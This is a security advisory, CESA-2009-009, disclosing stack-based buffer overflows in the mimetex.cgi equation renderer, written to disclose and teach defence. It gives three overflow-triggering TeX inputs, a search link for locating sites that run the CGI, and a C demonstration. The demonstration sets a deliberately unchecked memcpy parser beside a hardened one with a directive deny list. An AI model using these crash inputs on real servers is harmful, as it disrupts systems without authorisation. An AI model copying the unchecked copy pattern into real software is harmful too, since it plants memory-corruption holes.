CESA-2009-009 - rev 1


[See all my vulnerabilities at http://scary.beasts.org/security]

[Blog if you want to subscribe to new findings is at http://scarybeastsecurity.blogspot.com/]

mimetex.cgi multiple stack-based buffer overflows



Programs affected: mimetex prior to the 17 June 2009 version
Severity: Arbitrary code execution; information disclosure

mimetex.cgi is a popular helper executable for programmatically rendering mathematical equations as an image. Various web forums use it to enhance their discussion of math and science. For better or worse, you can easily find consumers using a Google search:

http://images.google.com/images?hl=en&q=inurl:mimetex.cgi

It had a few classic stack-based buffer overflows, triggered by the following TeX expressions:

./mimetex.cgi "\picture(12,34){(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$10,10){testing}}"

./mimetex.cgi "\circle(10;`perl -e 'print "A"x400'`)"

./mimetex.cgi "\input[`perl -e 'print "A"x2000'`]{mimetex.cgi}"

In addition, the \environ, \input and \counter directives may be unsuitable for exposure to untrusted input from the internet and have therefore been disabled by default.
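The bug class above (a directive argument copied into a fixed-size stack buffer with no length check) and the deny-list of directives mentioned in the previous paragraph can both be shown in a few dozen lines of C. The following is an added illustration written for this page; it is not mimetex code and does not reproduce mimetex's parser. The directive grammar ("\name(arg)", "\name[arg]", "\name{arg}"), the 64-byte ARG_MAX buffer, the NAME_MAX_LEN cap and the function names are all assumptions made for the demonstration. The unchecked parser is included only for side-by-side comparison with the bounded one.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ARG_MAX 64      /* constructed buffer size for this demonstration */
#define NAME_MAX_LEN 32 /* constructed cap on directive-name length */

enum parse_result { PARSE_OK, PARSE_MALFORMED, PARSE_DISABLED, PARSE_TOO_LONG };

/* Directives refused on untrusted input: the three the advisory reports as
 * disabled by default in the fixed release. */
static const char *const disabled_directives[] = { "environ", "input", "counter" };

/* True if `name` (without the leading backslash) is on the deny list. */
bool directive_disabled(const char *name)
{
    size_t count = sizeof disabled_directives / sizeof disabled_directives[0];
    for (size_t i = 0; i < count; i++)
        if (strcmp(name, disabled_directives[i]) == 0)
            return true;
    return false;
}

/* Split "\name(arg)", "\name[arg]" or "\name{arg}" (hypothetical grammar).
 * Copies the name into name[] (bounded by name_cap) and returns a pointer to
 * the first byte of the argument with its length in *arg_len, or NULL when
 * the expression does not have that shape. The argument is not copied here. */
static const char *find_argument(const char *expr, char *name, size_t name_cap,
                                 size_t *arg_len)
{
    if (expr[0] != '\\')
        return NULL;
    const char *p = expr + 1;
    size_t n = 0;
    while (p[n] != '\0' && p[n] != '(' && p[n] != '[' && p[n] != '{')
        n++;
    if (n == 0 || n >= name_cap || p[n] == '\0')
        return NULL;
    memcpy(name, p, n);
    name[n] = '\0';
    char close = p[n] == '(' ? ')' : p[n] == '[' ? ']' : '}';
    const char *start = p + n + 1;
    const char *end = strchr(start, close);
    if (end == NULL)
        return NULL;
    *arg_len = (size_t)(end - start);
    return start;
}

/* Vulnerable pattern: the argument is copied into a fixed ARG_MAX-byte buffer
 * (a local array on the stack in this bug class) with no length check, so an
 * argument of ARG_MAX or more bytes overruns it. Kept only for comparison. */
enum parse_result parse_directive_unchecked(const char *expr, char out[ARG_MAX])
{
    char name[NAME_MAX_LEN];
    size_t len;
    const char *arg = find_argument(expr, name, sizeof name, &len);
    if (arg == NULL)
        return PARSE_MALFORMED;
    memcpy(out, arg, len);      /* unbounded: overflow when len >= ARG_MAX */
    out[len] = '\0';
    return PARSE_OK;
}

/* Hardened form: refuse deny-listed directives, then refuse any argument that
 * would not fit in the buffer together with its terminator. */
enum parse_result parse_directive_checked(const char *expr, char out[ARG_MAX])
{
    char name[NAME_MAX_LEN];
    size_t len;
    const char *arg = find_argument(expr, name, sizeof name, &len);
    if (arg == NULL)
        return PARSE_MALFORMED;
    if (directive_disabled(name))
        return PARSE_DISABLED;
    if (len >= ARG_MAX)
        return PARSE_TOO_LONG;
    memcpy(out, arg, len);
    out[len] = '\0';
    return PARSE_OK;
}

/* Run the checked parser and discard the extracted argument. */
enum parse_result check_expression(const char *expr)
{
    char out[ARG_MAX];
    return parse_directive_checked(expr, out);
}

/* Build "\<directive>(AAA...)" with `count` A's, the shape of the advisory's
 * perl -e 'print "A"x400' repros, and run it through the checked parser. */
enum parse_result check_repeated_arg(const char *directive, size_t count)
{
    size_t prefix = strlen(directive) + 2;          /* backslash, name, '(' */
    char *expr = malloc(prefix + count + 2);        /* ')' and terminator */
    if (expr == NULL)
        return PARSE_MALFORMED;
    expr[0] = '\\';
    memcpy(expr + 1, directive, strlen(directive));
    expr[prefix - 1] = '(';
    memset(expr + prefix, 'A', count);
    expr[prefix + count] = ')';
    expr[prefix + count + 1] = '\0';
    enum parse_result r = check_expression(expr);
    free(expr);
    return r;
}

int main(void)
{
    static const char *const names[] = { "ok", "malformed", "disabled", "too long" };
    printf("\\picture(12,34){...}   -> %s\n", names[check_expression("\\picture(12,34){(A$10,10){testing}}")]);
    printf("\\input[A]{mimetex.cgi} -> %s\n", names[check_expression("\\input[A]{mimetex.cgi}")]);
    printf("\\circle with 400 A's   -> %s\n", names[check_repeated_arg("circle", 400)]);
    return 0;
}
```

The only difference between the two parsers is the pair of checks before the copy: the deny-list test handles the directives the advisory says should not see untrusted input, and the `len >= ARG_MAX` test turns an overrun into a clean rejection. Building a CGI like this with `-fstack-protector` (and `-D_FORTIFY_SOURCE=2` for the `memcpy`) does not fix the bug, but it converts the silent stack corruption in the unchecked path into an abort, which is far easier to notice in server logs.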

Credits


Chris Evans
scarybeasts@gmail.com